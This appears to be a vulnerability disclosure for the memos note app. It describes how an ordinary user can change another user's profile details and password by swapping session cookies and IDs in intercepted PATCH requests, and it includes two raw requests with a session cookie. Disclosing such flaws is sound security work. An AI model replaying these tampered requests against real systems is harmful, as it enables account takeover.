Description

A user (neither admin nor host) can modify nickname, username and email from other users without permission, being a normal user.

Steps to Reproduce

1. Login as user A (here, called “ileana.maricel”, HOST role).
2. In another browser login as user B (called “ileana.mariceel”, USER role). Copy the Cookie.
3. With user A, go to Setting –> Update Information.
4. Change nickname, username and/or email.
5. When selecting Save, intercept the request with a web proxy and modify the cookie for User B’s cookie value. Also modify the path id, including the User B’s ID to avoid errors:

PATCH /api/user/2 HTTP/1.1
Host: localhost:5230
Content-Type: application/json
Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
Connection: close

{"id":1,"nickname":"ileana.maricel.edited",
"username":"ileana.maricel.username.modified","email":"[email protected]"}

6. Send the request and see information has changed for user A.

Figure 1

7. Also you can change the password of other users! To do this, go to Setting –> Change Password in User A session.
8. Enter the required values and select Save, intercepting the request.
9. Change the cookie by the one from User B.
10. Also change path id by 2, which is User B’s id, to avoid errors when validations take place.
11. Send the request (the endpoint is the same for updating info) and see password has been changed for User A.

PATCH /api/user/2 HTTP/1.1
Host: localhost:5230
Content-Type: application/json
Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
Connection: close

{"id":1,"password":"Changed"}

Figure 2

12. Log out from User A and try to login with original credentials for this same user: it is not possible anymore.

Figure 3